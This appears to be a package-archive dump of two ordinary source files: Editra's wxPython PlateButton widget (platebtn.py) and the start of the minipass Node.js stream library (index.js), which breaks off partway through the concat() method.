/Editra-0.7.20.tar.gz/Editra-0.7.20/src/eclib/platebtn.py | __author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: platebtn.py 73153 2012-12-08 20:23:44Z CJP $"
__revision__ = "$Revision: 73153 $"
__all__ = ["PlateButton",
"PLATE_NORMAL", "PLATE_PRESSED", "PLATE_HIGHLIGHT",
"PB_STYLE_DEFAULT", "PB_STYLE_GRADIENT", "PB_STYLE_SQUARE",
"PB_STYLE_NOBG", "PB_STYLE_DROPARROW", "PB_STYLE_TOGGLE",
"EVT_PLATEBTN_DROPARROW_PRESSED"]
#-----------------------------------------------------------------------------#
# Imports
import wx
import wx.lib.newevent
# Local Imports
from eclutil import *
#-----------------------------------------------------------------------------#
# Button States
PLATE_NORMAL = 0
PLATE_PRESSED = 1
PLATE_HIGHLIGHT = 2
# Button Styles
PB_STYLE_DEFAULT = 1 # Normal Flat Background
PB_STYLE_GRADIENT = 2 # Gradient Filled Background
PB_STYLE_SQUARE = 4 # Use square corners instead of rounded
PB_STYLE_NOBG = 8 # Usefull on Windows to get a transparent appearance
# when the control is shown on a non solid background
PB_STYLE_DROPARROW = 16 # Draw drop arrow and fire EVT_PLATEBTN_DROPRROW_PRESSED event
PB_STYLE_TOGGLE = 32 # Stay pressed untill clicked again
#-----------------------------------------------------------------------------#
# EVT_BUTTON used for normal event notification
# EVT_TOGGLE_BUTTON used for toggle button mode notification
PlateBtnDropArrowPressed, EVT_PLATEBTN_DROPARROW_PRESSED = wx.lib.newevent.NewEvent()
#-----------------------------------------------------------------------------#
class PlateButton(wx.PyControl):
"""PlateButton is a custom type of flat button with support for
displaying bitmaps and having an attached dropdown menu.
"""
def __init__(self, parent, id=wx.ID_ANY, label='', bmp=None,
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=PB_STYLE_DEFAULT, name=wx.ButtonNameStr):
"""Create a PlateButton
@keyword label: Buttons label text
@keyword bmp: Buttons bitmap
@keyword style: Button style
"""
super(PlateButton, self).__init__(parent, id, pos, size,
wx.BORDER_NONE|wx.TRANSPARENT_WINDOW,
name=name)
# Attributes
self.InheritAttributes()
self._bmp = dict(enable=None, disable=None)
if bmp is not None:
assert isinstance(bmp, wx.Bitmap) and bmp.IsOk()
self._bmp['enable'] = bmp
img = bmp.ConvertToImage()
img = img.ConvertToGreyscale(.795, .073, .026) #(.634, .224, .143)
self._bmp['disable'] = wx.BitmapFromImage(img)
self._menu = None
self.SetLabel(label)
self._style = style
self._state = dict(pre=PLATE_NORMAL, cur=PLATE_NORMAL)
self._color = self.__InitColors()
self._pressed = False
# Setup Initial Size
self.SetInitialSize(size)
# Event Handlers
self.Bind(wx.EVT_PAINT, lambda evt: self.__DrawButton())
self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
self.Bind(wx.EVT_SET_FOCUS, self.OnFocus)
self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)
# Mouse Events
self.Bind(wx.EVT_LEFT_DCLICK, lambda evt: self._ToggleState())
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
self.Bind(wx.EVT_ENTER_WINDOW,
lambda evt: self._SetState(PLATE_HIGHLIGHT))
self.Bind(wx.EVT_LEAVE_WINDOW,
lambda evt: wx.CallLater(80, self.__LeaveWindow))
# Other events
self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
self.Bind(wx.EVT_CONTEXT_MENU, lambda evt: self.ShowMenu())
def __DrawBitmap(self, gc):
"""Draw the bitmap if one has been set
@param gc: GCDC to draw with
@return: x cordinate to draw text at
"""
if self.IsEnabled():
bmp = self._bmp['enable']
else:
bmp = self._bmp['disable']
if bmp is not None and bmp.IsOk():
bw, bh = bmp.GetSize()
ypos = (self.GetSize()[1] - bh) // 2
gc.DrawBitmap(bmp, 6, ypos, bmp.GetMask() != None)
return bw + 6
else:
return 6
def __DrawDropArrow(self, gc, xpos, ypos):
"""Draw a drop arrow if needed and restore pen/brush after finished
@param gc: GCDC to draw with
@param xpos: x cord to start at
@param ypos: y cord to start at
"""
if self._menu is not None or self._style & PB_STYLE_DROPARROW:
# Positioning needs a little help on Windows
if wx.Platform == '__WXMSW__':
xpos -= 2
tripoints = [(xpos, ypos), (xpos + 6, ypos), (xpos + 3, ypos + 5)]
brush_b = gc.GetBrush()
pen_b = gc.GetPen()
gc.SetPen(wx.TRANSPARENT_PEN)
gc.SetBrush(wx.Brush(gc.GetTextForeground()))
gc.DrawPolygon(tripoints)
gc.SetBrush(brush_b)
gc.SetPen(pen_b)
else:
pass
def __DrawHighlight(self, gc, width, height):
"""Draw the main highlight/pressed state
@param gc: GCDC to draw with
@param width: width of highlight
@param height: height of highlight
"""
if self._state['cur'] == PLATE_PRESSED:
color = self._color['press']
else:
color = self._color['hlight']
if self._style & PB_STYLE_SQUARE:
rad = 0
else:
rad = (height - 3) / 2
if self._style & PB_STYLE_GRADIENT:
gc.SetBrush(wx.TRANSPARENT_BRUSH)
rgc = gc.GetGraphicsContext()
brush = rgc.CreateLinearGradientBrush(0, 1, 0, height,
color, AdjustAlpha(color, 55))
rgc.SetBrush(brush)
else:
gc.SetBrush(wx.Brush(color))
gc.DrawRoundedRectangle(1, 1, width - 2, height - 2, rad)
def __PostEvent(self):
"""Post a button event to parent of this control"""
if self._style & PB_STYLE_TOGGLE:
etype = wx.wxEVT_COMMAND_TOGGLEBUTTON_CLICKED
else:
etype = wx.wxEVT_COMMAND_BUTTON_CLICKED
bevt = wx.CommandEvent(etype, self.GetId())
bevt.SetEventObject(self)
bevt.SetString(self.GetLabel())
self.GetEventHandler().ProcessEvent(bevt)
def __DrawButton(self):
"""Draw the button"""
dc = wx.PaintDC(self)
gc = wx.GCDC(dc)
# Setup
dc.SetBrush(wx.TRANSPARENT_BRUSH)
gc.SetBrush(wx.TRANSPARENT_BRUSH)
gc.SetFont(self.Font)
dc.SetFont(self.Font)
gc.SetBackgroundMode(wx.TRANSPARENT)
# The background needs some help to look transparent on
# on Gtk and Windows
if wx.Platform in ['__WXGTK__', '__WXMSW__']:
gc.SetBackground(self.GetBackgroundBrush(gc))
gc.Clear()
# Calc Object Positions
width, height = self.GetSize()
if wx.Platform == '__WXGTK__':
tw, th = dc.GetTextExtent(self.Label)
else:
tw, th = gc.GetTextExtent(self.Label)
txt_y = max((height - th) // 2, 1)
if self._state['cur'] == PLATE_HIGHLIGHT:
gc.SetTextForeground(self._color['htxt'])
gc.SetPen(wx.TRANSPARENT_PEN)
self.__DrawHighlight(gc, width, height)
elif self._state['cur'] == PLATE_PRESSED:
gc.SetTextForeground(self._color['htxt'])
if wx.Platform == '__WXMAC__':
pen = wx.Pen(GetHighlightColour(), 1, wx.SOLID)
else:
pen = wx.Pen(AdjustColour(self._color['press'], -80, 220), 1)
gc.SetPen(pen)
self.__DrawHighlight(gc, width, height)
txt_x = self.__DrawBitmap(gc)
if wx.Platform == '__WXGTK__':
dc.DrawText(self.Label, txt_x + 2, txt_y)
else:
gc.DrawText(self.Label, txt_x + 2, txt_y)
self.__DrawDropArrow(gc, width - 10, (height // 2) - 2)
else:
if self.IsEnabled():
gc.SetTextForeground(self.GetForegroundColour())
else:
txt_c = wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)
gc.SetTextForeground(txt_c)
# Draw bitmap and text
if self._state['cur'] != PLATE_PRESSED:
txt_x = self.__DrawBitmap(gc)
if wx.Platform == '__WXGTK__':
dc.DrawText(self.Label, txt_x + 2, txt_y)
else:
gc.DrawText(self.Label, txt_x + 2, txt_y)
self.__DrawDropArrow(gc, width - 10, (height // 2) - 2)
def __InitColors(self):
"""Initialize the default colors"""
color = GetHighlightColour()
pcolor = AdjustColour(color, -12)
colors = dict(default=True,
hlight=color,
press=pcolor,
htxt=BestLabelColour(self.GetForegroundColour()))
return colors
def __LeaveWindow(self):
"""Handle updating the buttons state when the mouse cursor leaves"""
if (self._style & PB_STYLE_TOGGLE) and self._pressed:
self._SetState(PLATE_PRESSED)
else:
self._SetState(PLATE_NORMAL)
self._pressed = False
def _SetState(self, state):
"""Manually set the state of the button
@param state: one of the PLATE_* values
@note: the state may be altered by mouse actions
@note: Internal use only!
"""
self._state['pre'] = self._state['cur']
self._state['cur'] = state
if wx.Platform == '__WXMSW__':
self.Parent.RefreshRect(self.Rect, False)
else:
self.Refresh()
def _ToggleState(self):
"""Toggle button state
@note: Internal Use Only!
"""
if self._state['cur'] != PLATE_PRESSED:
self._SetState(PLATE_PRESSED)
else:
self._SetState(PLATE_HIGHLIGHT)
#---- End Private Member Function ----#
#---- Public Member Functions ----#
BitmapDisabled = property(lambda self: self.GetBitmapDisabled(),
lambda self, bmp: self.SetBitmapDisabled(bmp))
BitmapLabel = property(lambda self: self.GetBitmapLabel(),
lambda self, bmp: self.SetBitmap(bmp))
# Aliases
BitmapFocus = BitmapLabel
BitmapHover = BitmapLabel
BitmapSelected = BitmapLabel
LabelText = property(lambda self: self.GetLabel(),
lambda self, lbl: self.SetLabel(lbl))
def AcceptsFocus(self):
"""Can this window have the focus?"""
return self.IsEnabled()
def Disable(self):
"""Disable the control"""
super(PlateButton, self).Disable()
self.Refresh()
def DoGetBestSize(self):
"""Calculate the best size of the button
@return: wx.Size
"""
width = 4
height = 6
if self.Label:
# NOTE: Should measure with a GraphicsContext to get right
# size, but due to random segfaults on linux special
# handling is done in the drawing instead...
lsize = self.GetFullTextExtent(self.Label)
width += lsize[0]
height += lsize[1]
if self._bmp['enable'] is not None:
bsize = self._bmp['enable'].Size
width += (bsize[0] + 10)
if height <= bsize[1]:
height = bsize[1] + 6
else:
height += 3
else:
width += 10
if self._menu is not None or self._style & PB_STYLE_DROPARROW:
width += 12
best = wx.Size(width, height)
self.CacheBestSize(best)
return best
def Enable(self, enable=True):
"""Enable/Disable the control"""
super(PlateButton, self).Enable(enable)
self.Refresh()
def GetBackgroundBrush(self, dc):
"""Get the brush for drawing the background of the button
@return: wx.Brush
@note: used internally when on gtk
"""
if wx.Platform == '__WXMAC__' or self._style & PB_STYLE_NOBG:
return wx.TRANSPARENT_BRUSH
bkgrd = self.GetBackgroundColour()
brush = wx.Brush(bkgrd, wx.SOLID)
my_attr = self.GetDefaultAttributes()
p_attr = self.Parent.GetDefaultAttributes()
my_def = bkgrd == my_attr.colBg
p_def = self.Parent.GetBackgroundColour() == p_attr.colBg
if my_def and not p_def:
bkgrd = self.Parent.GetBackgroundColour()
brush = wx.Brush(bkgrd, wx.SOLID)
return brush
def GetBitmapDisabled(self):
"""Get the bitmap of the disable state
@return: wx.Bitmap or None
"""
return self.BitmapDisabled
def GetBitmapLabel(self):
"""Get the label bitmap
@return: wx.Bitmap or None
"""
return self.BitmapLabel
# GetBitmap Aliases for BitmapButton api
GetBitmapFocus = GetBitmapLabel
GetBitmapHover = GetBitmapLabel
# Alias for GetLabel
GetLabelText = wx.PyControl.GetLabel
def GetMenu(self):
"""Return the menu associated with this button or None if no
menu is associated with it.
"""
return self._menu
def GetState(self):
"""Get the current state of the button
@return: int
@see: PLATE_NORMAL, PLATE_HIGHLIGHT, PLATE_PRESSED
"""
return self._state['cur']
def HasTransparentBackground(self):
"""Override setting of background fill"""
return True
def IsPressed(self):
"""Return if button is pressed (PB_STYLE_TOGGLE)
@return: bool
"""
return self._pressed
#---- Event Handlers ----#
def OnErase(self, evt):
"""Trap the erase event to keep the background transparent
on windows.
@param evt: wx.EVT_ERASE_BACKGROUND
"""
if not (PB_STYLE_NOBG & self._style):
evt.Skip()
def OnFocus(self, evt):
"""Set the visual focus state if need be"""
if self._state['cur'] == PLATE_NORMAL:
self._SetState(PLATE_HIGHLIGHT)
def OnKeyUp(self, evt):
"""Execute a single button press action when the Return key is pressed
and this control has the focus.
@param evt: wx.EVT_KEY_UP
"""
if evt.GetKeyCode() == wx.WXK_SPACE:
self._SetState(PLATE_PRESSED)
self.__PostEvent()
wx.CallLater(100, self._SetState, PLATE_HIGHLIGHT)
else:
evt.Skip()
def OnKillFocus(self, evt):
"""Set the visual state back to normal when focus is lost
unless the control is currently in a pressed state.
"""
# Note: this delay needs to be at least as much as the on in the KeyUp
# handler to prevent ghost highlighting from happening when
# quickly changing focus and activating buttons
if self._state['cur'] != PLATE_PRESSED:
self._SetState(PLATE_NORMAL)
def OnLeftDown(self, evt):
"""Sets the pressed state and depending on the click position will
show the popup menu if one has been set.
"""
if (self._style & PB_STYLE_TOGGLE):
self._pressed = not self._pressed
pos = evt.GetPositionTuple()
self._SetState(PLATE_PRESSED)
size = self.GetSizeTuple()
if pos[0] >= size[0] - 16:
if self._menu is not None:
self.ShowMenu()
elif self._style & PB_STYLE_DROPARROW:
event = PlateBtnDropArrowPressed()
event.SetEventObject(self)
self.EventHandler.ProcessEvent(event)
self.SetFocus()
def OnLeftUp(self, evt):
"""Post a button event if the control was previously in a
pressed state.
@param evt: wx.MouseEvent
"""
if self._state['cur'] == PLATE_PRESSED:
pos = evt.GetPositionTuple()
size = self.GetSizeTuple()
if not (self._style & PB_STYLE_DROPARROW and pos[0] >= size[0] - 16):
self.__PostEvent()
if self._pressed:
self._SetState(PLATE_PRESSED)
else:
self._SetState(PLATE_HIGHLIGHT)
def OnMenuClose(self, evt):
"""Refresh the control to a proper state after the menu has been
dismissed.
@param evt: wx.EVT_MENU_CLOSE
"""
mpos = wx.GetMousePosition()
if self.HitTest(self.ScreenToClient(mpos)) != wx.HT_WINDOW_OUTSIDE:
self._SetState(PLATE_HIGHLIGHT)
else:
self._SetState(PLATE_NORMAL)
evt.Skip()
#---- End Event Handlers ----#
def SetBitmap(self, bmp):
"""Set the bitmap displayed in the button
@param bmp: wx.Bitmap
"""
self._bmp['enable'] = bmp
img = bmp.ConvertToImage()
img = img.ConvertToGreyscale(.795, .073, .026) #(.634, .224, .143)
self._bmp['disable'] = img.ConvertToBitmap()
self.InvalidateBestSize()
def SetBitmapDisabled(self, bmp):
"""Set the bitmap for the disabled state
@param bmp: wx.Bitmap
"""
self._bmp['disable'] = bmp
# Aliases for SetBitmap* functions from BitmapButton
SetBitmapFocus = SetBitmap
SetBitmapHover = SetBitmap
SetBitmapLabel = SetBitmap
SetBitmapSelected = SetBitmap
def SetFocus(self):
"""Set this control to have the focus"""
if self._state['cur'] != PLATE_PRESSED:
self._SetState(PLATE_HIGHLIGHT)
super(PlateButton, self).SetFocus()
def SetFont(self, font):
"""Adjust size of control when font changes"""
super(PlateButton, self).SetFont(font)
self.InvalidateBestSize()
def SetLabel(self, label):
"""Set the label of the button
@param label: lable string
"""
super(PlateButton, self).SetLabel(label)
self.InvalidateBestSize()
def SetLabelColor(self, normal, hlight=wx.NullColour):
"""Set the color of the label. The optimal label color is usually
automatically selected depending on the button color. In some
cases the colors that are chosen may not be optimal.
The normal state must be specified, if the other two params are left
Null they will be automatically guessed based on the normal color. To
prevent this automatic color choices from happening either specify
a color or None for the other params.
@param normal: Label color for normal state (wx.Colour)
@keyword hlight: Color for when mouse is hovering over
"""
assert isinstance(normal, wx.Colour), "Must supply a colour object"
self._color['default'] = False
self.SetForegroundColour(normal)
if hlight is not None:
if hlight.IsOk():
self._color['htxt'] = hlight
else:
self._color['htxt'] = BestLabelColour(normal)
if wx.Platform == '__WXMSW__':
self.Parent.RefreshRect(self.GetRect(), False)
else:
self.Refresh()
def SetMenu(self, menu):
"""Set the menu that can be shown when clicking on the
drop arrow of the button.
@param menu: wxMenu to use as a PopupMenu
@note: Arrow is not drawn unless a menu is set
"""
if self._menu is not None:
self.Unbind(wx.EVT_MENU_CLOSE)
self._menu = menu
self.Bind(wx.EVT_MENU_CLOSE, self.OnMenuClose)
self.InvalidateBestSize()
def SetPressColor(self, color):
"""Set the color used for highlighting the pressed state
@param color: wx.Colour
@note: also resets all text colours as necessary
"""
self._color['default'] = False
if color.Alpha() == 255:
self._color['hlight'] = AdjustAlpha(color, 200)
else:
self._color['hlight'] = color
self._color['press'] = AdjustColour(color, -10, 160)
self._color['htxt'] = BestLabelColour(self._color['hlight'])
self.Refresh()
def SetWindowStyle(self, style):
"""Sets the window style bytes, the updates take place
immediately no need to call refresh afterwards.
@param style: bitmask of PB_STYLE_* values
"""
self._style = style
self.Refresh()
def SetWindowVariant(self, variant):
"""Set the variant/font size of this control"""
super(PlateButton, self).SetWindowVariant(variant)
self.InvalidateBestSize()
def ShouldInheritColours(self):
"""Overridden base class virtual. If the parent has non-default
colours then we want this control to inherit them.
"""
return True
def ShowMenu(self):
"""Show the dropdown menu if one is associated with this control"""
if self._menu is not None:
size = self.GetSizeTuple()
adj = wx.Platform == '__WXMAC__' and 3 or 0
if self._style & PB_STYLE_SQUARE:
xpos = 1
else:
xpos = size[1] / 2
self.PopupMenu(self._menu, (xpos, size[1] + adj))
#---- End Public Member Functions ----# | PypiClean |
/Newcalls-0.0.1-cp37-cp37m-win_amd64.whl/newcalls/node_modules/minipass/index.js | 'use strict'
const proc =
typeof process === 'object' && process
? process
: {
stdout: null,
stderr: null,
}
const EE = require('events')
const Stream = require('stream')
const stringdecoder = require('string_decoder')
const SD = stringdecoder.StringDecoder
const EOF = Symbol('EOF')
const MAYBE_EMIT_END = Symbol('maybeEmitEnd')
const EMITTED_END = Symbol('emittedEnd')
const EMITTING_END = Symbol('emittingEnd')
const EMITTED_ERROR = Symbol('emittedError')
const CLOSED = Symbol('closed')
const READ = Symbol('read')
const FLUSH = Symbol('flush')
const FLUSHCHUNK = Symbol('flushChunk')
const ENCODING = Symbol('encoding')
const DECODER = Symbol('decoder')
const FLOWING = Symbol('flowing')
const PAUSED = Symbol('paused')
const RESUME = Symbol('resume')
const BUFFER = Symbol('buffer')
const PIPES = Symbol('pipes')
const BUFFERLENGTH = Symbol('bufferLength')
const BUFFERPUSH = Symbol('bufferPush')
const BUFFERSHIFT = Symbol('bufferShift')
const OBJECTMODE = Symbol('objectMode')
// internal event when stream is destroyed
const DESTROYED = Symbol('destroyed')
// internal event when stream has an error
const ERROR = Symbol('error')
const EMITDATA = Symbol('emitData')
const EMITEND = Symbol('emitEnd')
const EMITEND2 = Symbol('emitEnd2')
const ASYNC = Symbol('async')
const ABORT = Symbol('abort')
const ABORTED = Symbol('aborted')
const SIGNAL = Symbol('signal')
const defer = fn => Promise.resolve().then(fn)
// TODO remove when Node v8 support drops
const doIter = global._MP_NO_ITERATOR_SYMBOLS_ !== '1'
const ASYNCITERATOR =
(doIter && Symbol.asyncIterator) || Symbol('asyncIterator not implemented')
const ITERATOR =
(doIter && Symbol.iterator) || Symbol('iterator not implemented')
// events that mean 'the stream is over'
// these are treated specially, and re-emitted
// if they are listened for after emitting.
const isEndish = ev => ev === 'end' || ev === 'finish' || ev === 'prefinish'
const isArrayBuffer = b =>
b instanceof ArrayBuffer ||
(typeof b === 'object' &&
b.constructor &&
b.constructor.name === 'ArrayBuffer' &&
b.byteLength >= 0)
const isArrayBufferView = b => !Buffer.isBuffer(b) && ArrayBuffer.isView(b)
class Pipe {
constructor(src, dest, opts) {
this.src = src
this.dest = dest
this.opts = opts
this.ondrain = () => src[RESUME]()
dest.on('drain', this.ondrain)
}
unpipe() {
this.dest.removeListener('drain', this.ondrain)
}
// istanbul ignore next - only here for the prototype
proxyErrors() {}
end() {
this.unpipe()
if (this.opts.end) this.dest.end()
}
}
class PipeProxyErrors extends Pipe {
unpipe() {
this.src.removeListener('error', this.proxyErrors)
super.unpipe()
}
constructor(src, dest, opts) {
super(src, dest, opts)
this.proxyErrors = er => dest.emit('error', er)
src.on('error', this.proxyErrors)
}
}
class Minipass extends Stream {
constructor(options) {
super()
this[FLOWING] = false
// whether we're explicitly paused
this[PAUSED] = false
this[PIPES] = []
this[BUFFER] = []
this[OBJECTMODE] = (options && options.objectMode) || false
if (this[OBJECTMODE]) this[ENCODING] = null
else this[ENCODING] = (options && options.encoding) || null
if (this[ENCODING] === 'buffer') this[ENCODING] = null
this[ASYNC] = (options && !!options.async) || false
this[DECODER] = this[ENCODING] ? new SD(this[ENCODING]) : null
this[EOF] = false
this[EMITTED_END] = false
this[EMITTING_END] = false
this[CLOSED] = false
this[EMITTED_ERROR] = null
this.writable = true
this.readable = true
this[BUFFERLENGTH] = 0
this[DESTROYED] = false
if (options && options.debugExposeBuffer === true) {
Object.defineProperty(this, 'buffer', { get: () => this[BUFFER] })
}
if (options && options.debugExposePipes === true) {
Object.defineProperty(this, 'pipes', { get: () => this[PIPES] })
}
this[SIGNAL] = options && options.signal
this[ABORTED] = false
if (this[SIGNAL]) {
this[SIGNAL].addEventListener('abort', () => this[ABORT]())
if (this[SIGNAL].aborted) {
this[ABORT]()
}
}
}
get bufferLength() {
return this[BUFFERLENGTH]
}
get encoding() {
return this[ENCODING]
}
set encoding(enc) {
if (this[OBJECTMODE]) throw new Error('cannot set encoding in objectMode')
if (
this[ENCODING] &&
enc !== this[ENCODING] &&
((this[DECODER] && this[DECODER].lastNeed) || this[BUFFERLENGTH])
)
throw new Error('cannot change encoding')
if (this[ENCODING] !== enc) {
this[DECODER] = enc ? new SD(enc) : null
if (this[BUFFER].length)
this[BUFFER] = this[BUFFER].map(chunk => this[DECODER].write(chunk))
}
this[ENCODING] = enc
}
setEncoding(enc) {
this.encoding = enc
}
get objectMode() {
return this[OBJECTMODE]
}
set objectMode(om) {
this[OBJECTMODE] = this[OBJECTMODE] || !!om
}
get ['async']() {
return this[ASYNC]
}
set ['async'](a) {
this[ASYNC] = this[ASYNC] || !!a
}
// drop everything and get out of the flow completely
[ABORT]() {
this[ABORTED] = true
this.emit('abort', this[SIGNAL].reason)
this.destroy(this[SIGNAL].reason)
}
get aborted() {
return this[ABORTED]
}
set aborted(_) {}
write(chunk, encoding, cb) {
if (this[ABORTED]) return false
if (this[EOF]) throw new Error('write after end')
if (this[DESTROYED]) {
this.emit(
'error',
Object.assign(
new Error('Cannot call write after a stream was destroyed'),
{ code: 'ERR_STREAM_DESTROYED' }
)
)
return true
}
if (typeof encoding === 'function') (cb = encoding), (encoding = 'utf8')
if (!encoding) encoding = 'utf8'
const fn = this[ASYNC] ? defer : f => f()
// convert array buffers and typed array views into buffers
// at some point in the future, we may want to do the opposite!
// leave strings and buffers as-is
// anything else switches us into object mode
if (!this[OBJECTMODE] && !Buffer.isBuffer(chunk)) {
if (isArrayBufferView(chunk))
chunk = Buffer.from(chunk.buffer, chunk.byteOffset, chunk.byteLength)
else if (isArrayBuffer(chunk)) chunk = Buffer.from(chunk)
else if (typeof chunk !== 'string')
// use the setter so we throw if we have encoding set
this.objectMode = true
}
// handle object mode up front, since it's simpler
// this yields better performance, fewer checks later.
if (this[OBJECTMODE]) {
/* istanbul ignore if - maybe impossible? */
if (this.flowing && this[BUFFERLENGTH] !== 0) this[FLUSH](true)
if (this.flowing) this.emit('data', chunk)
else this[BUFFERPUSH](chunk)
if (this[BUFFERLENGTH] !== 0) this.emit('readable')
if (cb) fn(cb)
return this.flowing
}
// at this point the chunk is a buffer or string
// don't buffer it up or send it to the decoder
if (!chunk.length) {
if (this[BUFFERLENGTH] !== 0) this.emit('readable')
if (cb) fn(cb)
return this.flowing
}
// fast-path writing strings of same encoding to a stream with
// an empty buffer, skipping the buffer/decoder dance
if (
typeof chunk === 'string' &&
// unless it is a string already ready for us to use
!(encoding === this[ENCODING] && !this[DECODER].lastNeed)
) {
chunk = Buffer.from(chunk, encoding)
}
if (Buffer.isBuffer(chunk) && this[ENCODING])
chunk = this[DECODER].write(chunk)
// Note: flushing CAN potentially switch us into not-flowing mode
if (this.flowing && this[BUFFERLENGTH] !== 0) this[FLUSH](true)
if (this.flowing) this.emit('data', chunk)
else this[BUFFERPUSH](chunk)
if (this[BUFFERLENGTH] !== 0) this.emit('readable')
if (cb) fn(cb)
return this.flowing
}
read(n) {
if (this[DESTROYED]) return null
if (this[BUFFERLENGTH] === 0 || n === 0 || n > this[BUFFERLENGTH]) {
this[MAYBE_EMIT_END]()
return null
}
if (this[OBJECTMODE]) n = null
if (this[BUFFER].length > 1 && !this[OBJECTMODE]) {
if (this.encoding) this[BUFFER] = [this[BUFFER].join('')]
else this[BUFFER] = [Buffer.concat(this[BUFFER], this[BUFFERLENGTH])]
}
const ret = this[READ](n || null, this[BUFFER][0])
this[MAYBE_EMIT_END]()
return ret
}
[READ](n, chunk) {
if (n === chunk.length || n === null) this[BUFFERSHIFT]()
else {
this[BUFFER][0] = chunk.slice(n)
chunk = chunk.slice(0, n)
this[BUFFERLENGTH] -= n
}
this.emit('data', chunk)
if (!this[BUFFER].length && !this[EOF]) this.emit('drain')
return chunk
}
end(chunk, encoding, cb) {
if (typeof chunk === 'function') (cb = chunk), (chunk = null)
if (typeof encoding === 'function') (cb = encoding), (encoding = 'utf8')
if (chunk) this.write(chunk, encoding)
if (cb) this.once('end', cb)
this[EOF] = true
this.writable = false
// if we haven't written anything, then go ahead and emit,
// even if we're not reading.
// we'll re-emit if a new 'end' listener is added anyway.
// This makes MP more suitable to write-only use cases.
if (this.flowing || !this[PAUSED]) this[MAYBE_EMIT_END]()
return this
}
// don't let the internal resume be overwritten
[RESUME]() {
if (this[DESTROYED]) return
this[PAUSED] = false
this[FLOWING] = true
this.emit('resume')
if (this[BUFFER].length) this[FLUSH]()
else if (this[EOF]) this[MAYBE_EMIT_END]()
else this.emit('drain')
}
resume() {
return this[RESUME]()
}
pause() {
this[FLOWING] = false
this[PAUSED] = true
}
get destroyed() {
return this[DESTROYED]
}
get flowing() {
return this[FLOWING]
}
get paused() {
return this[PAUSED]
}
[BUFFERPUSH](chunk) {
if (this[OBJECTMODE]) this[BUFFERLENGTH] += 1
else this[BUFFERLENGTH] += chunk.length
this[BUFFER].push(chunk)
}
[BUFFERSHIFT]() {
if (this[OBJECTMODE]) this[BUFFERLENGTH] -= 1
else this[BUFFERLENGTH] -= this[BUFFER][0].length
return this[BUFFER].shift()
}
[FLUSH](noDrain) {
do {} while (this[FLUSHCHUNK](this[BUFFERSHIFT]()) && this[BUFFER].length)
if (!noDrain && !this[BUFFER].length && !this[EOF]) this.emit('drain')
}
[FLUSHCHUNK](chunk) {
this.emit('data', chunk)
return this.flowing
}
pipe(dest, opts) {
if (this[DESTROYED]) return
const ended = this[EMITTED_END]
opts = opts || {}
if (dest === proc.stdout || dest === proc.stderr) opts.end = false
else opts.end = opts.end !== false
opts.proxyErrors = !!opts.proxyErrors
// piping an ended stream ends immediately
if (ended) {
if (opts.end) dest.end()
} else {
this[PIPES].push(
!opts.proxyErrors
? new Pipe(this, dest, opts)
: new PipeProxyErrors(this, dest, opts)
)
if (this[ASYNC]) defer(() => this[RESUME]())
else this[RESUME]()
}
return dest
}
unpipe(dest) {
const p = this[PIPES].find(p => p.dest === dest)
if (p) {
this[PIPES].splice(this[PIPES].indexOf(p), 1)
p.unpipe()
}
}
addListener(ev, fn) {
return this.on(ev, fn)
}
on(ev, fn) {
const ret = super.on(ev, fn)
if (ev === 'data' && !this[PIPES].length && !this.flowing) this[RESUME]()
else if (ev === 'readable' && this[BUFFERLENGTH] !== 0)
super.emit('readable')
else if (isEndish(ev) && this[EMITTED_END]) {
super.emit(ev)
this.removeAllListeners(ev)
} else if (ev === 'error' && this[EMITTED_ERROR]) {
if (this[ASYNC]) defer(() => fn.call(this, this[EMITTED_ERROR]))
else fn.call(this, this[EMITTED_ERROR])
}
return ret
}
get emittedEnd() {
return this[EMITTED_END]
}
[MAYBE_EMIT_END]() {
if (
!this[EMITTING_END] &&
!this[EMITTED_END] &&
!this[DESTROYED] &&
this[BUFFER].length === 0 &&
this[EOF]
) {
this[EMITTING_END] = true
this.emit('end')
this.emit('prefinish')
this.emit('finish')
if (this[CLOSED]) this.emit('close')
this[EMITTING_END] = false
}
}
emit(ev, data, ...extra) {
// error and close are only events allowed after calling destroy()
if (ev !== 'error' && ev !== 'close' && ev !== DESTROYED && this[DESTROYED])
return
else if (ev === 'data') {
return !this[OBJECTMODE] && !data
? false
: this[ASYNC]
? defer(() => this[EMITDATA](data))
: this[EMITDATA](data)
} else if (ev === 'end') {
return this[EMITEND]()
} else if (ev === 'close') {
this[CLOSED] = true
// don't emit close before 'end' and 'finish'
if (!this[EMITTED_END] && !this[DESTROYED]) return
const ret = super.emit('close')
this.removeAllListeners('close')
return ret
} else if (ev === 'error') {
this[EMITTED_ERROR] = data
super.emit(ERROR, data)
const ret =
!this[SIGNAL] || this.listeners('error').length
? super.emit('error', data)
: false
this[MAYBE_EMIT_END]()
return ret
} else if (ev === 'resume') {
const ret = super.emit('resume')
this[MAYBE_EMIT_END]()
return ret
} else if (ev === 'finish' || ev === 'prefinish') {
const ret = super.emit(ev)
this.removeAllListeners(ev)
return ret
}
// Some other unknown event
const ret = super.emit(ev, data, ...extra)
this[MAYBE_EMIT_END]()
return ret
}
[EMITDATA](data) {
for (const p of this[PIPES]) {
if (p.dest.write(data) === false) this.pause()
}
const ret = super.emit('data', data)
this[MAYBE_EMIT_END]()
return ret
}
[EMITEND]() {
if (this[EMITTED_END]) return
this[EMITTED_END] = true
this.readable = false
if (this[ASYNC]) defer(() => this[EMITEND2]())
else this[EMITEND2]()
}
[EMITEND2]() {
if (this[DECODER]) {
const data = this[DECODER].end()
if (data) {
for (const p of this[PIPES]) {
p.dest.write(data)
}
super.emit('data', data)
}
}
for (const p of this[PIPES]) {
p.end()
}
const ret = super.emit('end')
this.removeAllListeners('end')
return ret
}
// const all = await stream.collect()
collect() {
const buf = []
if (!this[OBJECTMODE]) buf.dataLength = 0
// set the promise first, in case an error is raised
// by triggering the flow here.
const p = this.promise()
this.on('data', c => {
buf.push(c)
if (!this[OBJECTMODE]) buf.dataLength += c.length
})
return p.then(() => buf)
}
// const data = await stream.concat()
concat() {
return this[OBJECTMODE]
? Promise.reject(new Error('cannot concat in objectMode'))
: this.collect().then(buf =>
